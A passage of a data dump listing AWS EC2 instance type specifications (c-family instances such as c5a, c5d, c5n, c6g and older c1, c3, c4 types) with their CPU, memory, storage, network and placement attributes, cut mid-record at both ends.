'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 100, 'Disks': [{'SizeInGB': 100, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 10752, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 10752}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1], 'SizeInMiB': 8192, 'TotalSizeInGB': 237, 'Disks': [{'SizeInGB': 237, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 4, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 237, 'Disks': [{'SizeInGB': 237, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1], 'SizeInMiB': 7168, 'TotalSizeInGB': 1680, 'Disks': [{'SizeInGB': 420, 'Count': 4, 'Type': 'hdd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 'c1.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64']}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 7168}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1680, 'Disks': [{'SizeInGB': 420, 'Count': 4, 'Type': 'hdd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 80, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 200, 'Disks': [{'SizeInGB': 200, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 21504, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 21504}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1], 'SizeInMiB': 16384, 'TotalSizeInGB': 474, 'Disks': [{'SizeInGB': 474, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 474, 'Disks': [{'SizeInGB': 474, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 